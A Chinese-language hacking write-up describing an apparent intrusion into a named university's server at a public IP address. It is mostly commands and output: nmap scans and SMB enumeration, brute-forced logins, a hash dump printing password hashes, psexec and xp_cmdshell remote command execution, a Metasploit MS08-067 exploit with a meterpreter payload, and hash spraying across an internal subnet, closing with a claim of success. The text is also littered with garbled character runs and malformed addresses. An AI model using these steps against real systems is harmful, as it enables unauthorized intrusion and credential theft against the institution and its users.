nmap+msf入侵广西师范

admin

广西师范网站http://202.103.242.241/
0 f. R. p5 h9 y5 X
root@bt:~# nmap -sS -sV 202.103.242.241

% c3 Q0 m# {+ TStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
7 J& w! _7 _& Y$ q' T5 `7 T$ F
& |) e. ]. ]. D8 E2 rNmap scan report for bogon (202.103.242.241)
6 Q4 f3 p: r. v& R4 S
Host is up (0.00048s latency).

Not shown: 993 closed ports
9 i5 d6 Y& l0 ?. I/ e& v- ]- g7 ^
PORT     STATE SERVICE       VERSION
7 {" j5 d1 W. S" Z
135/tcp  open  mstask        Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)

139/tcp  open  netbios-ssn

445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
) u/ x% ~, ^! w& X0 D. Y4 s1 ~
1025/tcp open  mstask        Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)

1026/tcp open  msrpc         Microsoft Windows RPC
/ g: `  V* z  A/ \
- u: P" D% g/ }7 b/ d; ?3372/tcp open  msdtc?
9 S6 d" d3 z, _  z
% r# m4 B' ?9 h6 ?6 f/ A- T# B3389/tcp open  ms-term-serv?
* j! k0 M) m1 M) u
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
! r: Q. y% ^$ k" Q9 {SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r

& t3 e& e2 ^4 t' v! X7 M( SSFGetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
4 u0 J: J: |8 I
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
4 D+ x  z8 [0 S& ^" z! Y, g( d
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO

SF:ptions,6,”hO\n\x000Z”);
- C- Z6 d1 T/ P9 K: p( I1 D$ k
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
  Z/ w0 E" B. f* k7 ?
1 _8 _/ p+ o. [2 b3 S/ n1 m7 o/ xService Info: OS: Windows

( L8 z1 e, x- Q' Y% oService detection performed. Please report any incorrect results at http://nmap.org/submit/ .
% P) \- k8 j" Z
' l* h: D& V6 o& E8 r1 bNmap done: 1 IP address (1 host up) scanned in 79.12 seconds
% d- D# h+ R6 Z/ X" @4 W
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb  //列出扫描脚本

' S4 p; ~1 A. j-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse

7 y0 ?. G4 k# w/ f  ~-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
# l5 P0 ^% }, K& O  x" Q
' Y4 h9 y8 [4 Y-rw-r–r– 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse

-rw-r–r– 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse

* {% h) m$ P% ^# S& P7 K' y7 U-rw-r–r– 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
$ f& }$ y6 H/ [
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
3 D7 v8 h0 S1 T5 `0 C5 a
-rw-r–r– 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse

, j% H% `, H% e& h# w  g) I9 L-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
+ Y2 N, |/ ]' D9 g' t8 {
8 x( U/ n  H- M-rw-r–r– 1 root root  1658 2011-07-09 07:36 smb-flood.nse
- Q( I. _0 F) e8 u$ C
-rw-r–r– 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse

- M8 \0 L5 e  Q# o-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse

-rw-r–r– 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
0 {# s, ]4 ], Y6 `  T7 t4 z
-rw-r–r– 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse

-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse

-rw-r–r– 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse
" H' F: g: A& i: H
& m0 y2 [7 q# }root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241   

//此乃使用脚本扫描远程机器所存在的账户名

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST

: f. U6 D/ e- U, `& mNmap scan report for bogon (202.103.242.241)

Host is up (0.00038s latency).

Not shown: 993 closed ports

/ I* J! Q7 ?# v% [% m0 oPORT     STATE SERVICE

: H: y$ W: @$ r3 z- [' z135/tcp  open  msrpc
/ X  Z2 b3 ^! S3 W$ c4 L0 B. P( k
$ ?( @( g& N) E4 e6 c139/tcp  open  netbios-ssn
9 U; }1 \) ]4 D9 x' o% B
445/tcp  open  microsoft-ds

* b0 k& Q& ^; S: g7 m8 t1025/tcp open  NFS-or-IIS
! }7 B$ A; `1 i, O
1026/tcp open  LSA-or-nterm

3372/tcp open  msdtc

, c' e+ C+ T7 U3389/tcp open  ms-term-serv
: O9 y+ Z, f( ~5 |. d0 _
$ O, p5 \6 C7 \% b4 z7 A8 H- QMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

4 o. Q: D7 _5 t8 S" B1 wHost script results:
0 Q. _( `6 b/ S& F" v4 O% _
2 n6 U  i% b- \1 Y8 ~4 I| smb-enum-users:

|_  Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
- o) X$ A1 T1 g
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241

& n; a9 H5 d2 R% d//查看共享

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST

# O  ?* G8 r/ E5 ?! YNmap scan report for bogon (202.103.242.241)

: G9 F5 Q" d1 s/ _# mHost is up (0.00035s latency).
" v4 d' S) [4 C( S5 Y' h9 y
6 ^. m8 B& D' P% N7 r* LNot shown: 993 closed ports
% t  I) H8 q' E$ [
PORT     STATE SERVICE

135/tcp  open  msrpc
- Z8 d; _) b" r% _: S& N
$ T6 f6 {% _* b" c* p# Z139/tcp  open  netbios-ssn
: y5 Z: Y7 y- T/ A5 U' ^0 |
3 J7 t( t2 A. w% I445/tcp  open  microsoft-ds

1025/tcp open  NFS-or-IIS
" p5 R7 A# E3 M
1026/tcp open  LSA-or-nterm

3372/tcp open  msdtc

4 B; ]' n4 U: |. V9 ], k8 d" |3389/tcp open  ms-term-serv

: V1 Q% f. F' z( E; xMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
- t# b  X. B' V
Host script results:

| smb-enum-shares:
- G% @) I2 I  E8 h+ r$ j
|   ADMIN$
/ z$ w) G1 }; J. Q" r" M3 y' Y+ u
1 R5 o9 y6 h' g|     Anonymous access: <none>
+ Z1 V7 W0 u7 A* _. r: M$ s
|   C$
+ i  g0 J+ g$ {
|     Anonymous access: <none>

# X2 l! m0 n  [# S|   IPC$

' B% J: _$ k+ I+ ?9 r3 j3 O|_    Anonymous access: READ
3 L! {( u3 M3 v. S
* S" h% T$ y" L+ a$ t3 j- o! f) _Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

9 w/ |: K* h) v9 I2 C8 O4 s" v- j/ sroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241      
3 A5 _$ ~$ ?. C5 Q- W0 Q% O! }
//获取用户密码
8 Q5 G* f2 s; J! R3 u
- ]) F' Y, W6 NStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
7 \- c6 X% ]* s& C! a4 ?3 A
Nmap scan report for bogon (202.103.242.2418)

+ y: h) R) _6 tHost is up (0.00041s latency).

. s, _# o9 B" r7 D$ p4 LNot shown: 993 closed ports

, r' z+ L8 ]' g5 p2 N2 [6 MPORT     STATE SERVICE
- l/ a1 s8 w( E0 U% c: |
8 w& g% Z1 ~$ W( x" M135/tcp  open  msrpc
- @8 ^, ^' R! j- c' J% y3 A
139/tcp  open  netbios-ssn
. m* d: A% H# j6 ]2 x! v* ^! ?1 |& d
  ~+ n; M% Q0 y$ g6 ]445/tcp  open  microsoft-ds

1025/tcp open  NFS-or-IIS

1026/tcp open  LSA-or-nterm
. _, a, h) r& R& b3 g2 n9 v5 d4 W  I
9 ~/ O& G# |* y, `3372/tcp open  msdtc

3389/tcp open  ms-term-serv
5 o! L6 c3 N) R+ ?4 u# s; w7 c
2 Z4 p2 n6 O, Z9 t  QMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

+ q* R6 H, _8 D8 }, j  cHost script results:
9 e( i9 ~$ h( d6 n
. O% S( e* [  e% G: ^' Z1 Q| smb-brute:

3 r. r" }( V' X) {. Zadministrator:<blank> => Login was successful

9 q4 a0 V) H* b5 v, Y7 C4 P|_  test:123456 => Login was successful
  h3 Q0 L0 J5 P0 D( W( s# f
7 O* K3 n# \! h7 U. Q% h, Z; SNmap done: 1 IP address (1 host up) scanned in 28.22 seconds
0 D- g4 x( `/ m5 K& m
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
( o  v& a. K' v# a' h; G  L! X/ y
, X, L; x$ k# I; e4 n3 Jroot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
, U# J5 C+ ^8 p- U
/ k1 F& r( M6 l# B& \' Vroot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
. d4 Z9 m0 x/ u  z
3 r4 c5 ~: v# q: Proot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

! k2 I3 Q( x4 TStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
; p% x7 `1 Q: o
$ m! D1 q8 N: U. y/ eNmap scan report for bogon (202.103.242.241)
) T* B1 z* Q5 I1 i! ]
# Z; U* j' o* J) n! L2 _9 }Host is up (0.0012s latency).

7 z7 K5 d1 [) X# k! g' {, EPORT    STATE SERVICE
. m- X& X9 U' p0 O. V4 c4 K
) J, d/ y9 Y% M3 f* J135/tcp open  msrpc
% [5 z9 Z  B# t, B- U9 M- p
2 h  e1 [. P$ C0 M: y; o; [; X139/tcp open  netbios-ssn
' D& J# j/ E5 a  \
- \; @$ h/ b- {+ A2 x) I445/tcp open  microsoft-ds
; I& W& |2 H! `0 @8 r' S; I
" s& j0 M. S  m7 S$ F8 ^MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
/ Z* [$ ^/ ~6 Z( \! z* {
' O. Q, w/ ~0 ]8 @& f* C; p0 E6 NHost script results:

| smb-pwdump:

| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
. |) N6 q' \, s3 u, ?
  ?, d! @5 b8 Q  g5 n% d5 `! I4 \- e| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
+ ]9 ^& v4 b. k. M8 U; F
1 @7 o& A+ k( F6 [8 x, j; o| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
. Z4 E* T3 ]( c. Z' ?
' Y$ O* t9 d2 G' K|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
7 Q9 V! N3 G6 V: F$ J9 n2 V5 q
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241  -u test             //获取一个cmdshell
4 [$ x7 _% H% r, F
+ m, q3 R+ q/ N9 d: y' ?-p 123456 -e cmd.exe

PsExec v1.55 – Execute processes remotely
2 S' J# X0 {% t/ {6 X( w+ o
( R3 k  W' X! c5 {& TCopyright (C) 2001-2004 Mark Russinovich
) ^. m0 y% b! L4 G* L  c
, g, F* q( I$ c5 m, W, }: XSysinternals – www.sysinternals.com
8 m+ c6 Z1 I) l3 L/ W# K
& U$ u% Y3 e8 O' QMicrosoft Windows 2000 [Version 5.00.2195]
$ d2 ~$ h; ^# H! v  d( T+ n
4 i( [8 i! {) z/ f0 n# }* s' {(C) 版权所有 1985-2000 Microsoft Corp.

# ]# _) y: O* w, wC:\WINNT\system32>ipconfig

Windows 2000 IP Configuration
2 E$ k9 `5 p) n
Ethernet adapter 本地连接:
0 w3 T- q/ R0 C' C) ^+ L7 f& R" ^( T
Connection-specific DNS Suffix  . :
0 j4 S( N2 b/ n2 V$ t% h6 I- C) }
IP Address. . . . . . . . . . . . : 202.103.242.241
5 f$ f( d1 c" o. d4 x% P" [
Subnet Mask . . . . . . . . . . . : 255.255.255.0
8 N, T: o* T( p" X
3 t3 _& m& e! a/ G$ Q+ ]5 YDefault Gateway . . . . . . . . . : 202.103.1.1
. {, r; D  L$ N8 i+ J* g$ d5 Z
, `3 z1 ?9 L9 M# M# H  VC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell ＇net user＇ “   //远程登录sa执行命令
# y" `; X; Y6 V" |' n, G* w- W, D
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241     //检测目标机器漏洞
1 c  {! T; j# P: K. ?# l
) J  q4 n8 c# h2 s5 h* C. ]% @9 RStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
3 ?, j: n" w  H* @, t" g- C+ }1 v
Nmap scan report for bogon (202.103.242.241)

Host is up (0.00046s latency).
- `7 Q5 A0 p( F  H4 @
Not shown: 993 closed ports
* d) s4 o+ b/ m1 i/ E$ N8 z
PORT     STATE SERVICE

135/tcp  open  msrpc
4 n/ i, y' `6 W; n
( {6 {) p3 x* Y  c9 R139/tcp  open  netbios-ssn
3 t4 s/ e* [( ?" @, [5 U
445/tcp  open  microsoft-ds

1025/tcp open  NFS-or-IIS
  b! r* }5 S( g9 H: c1 `  f  v
- V$ d9 G9 E6 M- B1026/tcp open  LSA-or-nterm

3372/tcp open  msdtc

2 w: }7 n' l; q  _# F5 Y3389/tcp open  ms-term-serv
7 K; Z$ {2 l# @2 D: x" r" z
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

2 f; n- _% R" R+ Y& @3 E1 B9 L+ kHost script results:

| smb-check-vulns:

|_  MS08-067: VULNERABLE
$ a) Q' X1 G) K- Y7 i
" W4 B1 U8 X# E. PNmap done: 1 IP address (1 host up) scanned in 1.43 seconds
  e6 r! z; i0 _+ [* D
9 c4 \) e  `" {7 Nroot@bt:~# msfconsole                                             //在msf上利用ms08-067漏洞对目标机器进行溢出
' J0 u6 `: U$ T* [
msf > search ms08
8 j/ K9 i: {" M8 Z, w! h+ }
msf > use exploit/windows/smb/ms08_067_netapi
1 k2 ?, J8 `3 ^! n
msf  exploit(ms08_067_netapi) > show options

1 b4 }) X5 {( q( O# ^msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
$ _# E) [+ w% F9 W1 {* G
- K/ f: ^! A- g0 d' `msf  exploit(ms08_067_netapi) > show payloads
; V' L9 M( V* s2 }2 _, `
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
7 S  ]* m  V& B+ l( z& U
, h/ o# ^- J  g3 P' k% K1 mmsf  exploit(ms08_067_netapi) > exploit

+ F, X' j0 V# V1 k9 T+ H5 b' S0 T+ Umeterpreter >

$ t' m* \: {0 [% Z/ oBackground session 2? [y/N]  (ctrl+z)
( ^4 R. X$ [) V0 t4 H
msf  exploit(ms08_067_netapi) > sessions -l
: X$ p3 k$ F" @+ G5 N. N
1 x# Q1 T9 N: c, F# Xroot@bt:/usr/local/share/nmap/scripts# vim usernames.txt

test

4 p0 O, T* ^  C! X  F/ {administrator

3 V3 E7 r9 [+ \root@bt:/usr/local/share/nmap/scripts# vim password.txt
7 p' j# o3 U  ~
) W4 [' C1 [  X  Q' H6 G7 x2 D8 W% b44EFCE164AB921CAAAD3B435B51404EE
" I' |6 T5 M  v, \- p
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
  O* q/ G: j$ D4 u! x
//利用用户名跟获取的hash尝试对整段内网进行登录

Nmap scan report for 192.168.1.105
4 q* i  I" I# \  U# p
Host is up (0.00088s latency).

Not shown: 993 closed ports
, h* x& `% g) u3 h' ~' @
PORT     STATE SERVICE
6 Q  d' K4 z8 O- C4 ^; u
  |7 k; H* \9 V" {$ n: j$ k135/tcp  open  msrpc
3 k0 b( W" s4 ^) e( J
& F( I  ~6 O2 \2 \6 }! l139/tcp  open  netbios-ssn
% Y( d; _$ B. g+ r7 M2 t1 Z
445/tcp  open  microsoft-ds
( w7 M+ d0 _( Q5 p5 ~
1025/tcp open  NFS-or-IIS

1026/tcp open  LSA-or-nterm
, C5 g4 d# U! [" x" y
6 B; k6 a$ `" i) u2 S3372/tcp open  msdtc
  K' I/ d) C3 z3 F! V
3389/tcp open  ms-term-serv

MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
: f7 ~( M1 J3 F1 ?2 _" M5 I) c
Host script results:

3 E4 r: g) @% a4 N# _3 j9 o| smb-brute:

: t0 M* f8 {8 W5 n|_  administrator:<blank> => Login was successful
, l; M5 r/ [7 W- y% f) Q' o
/ N, N* O2 p0 Z, }+ L攻击成功，一个简单的msf+nmap攻击~~·

# `, r' I) m, w0 Q/ |7 a5 k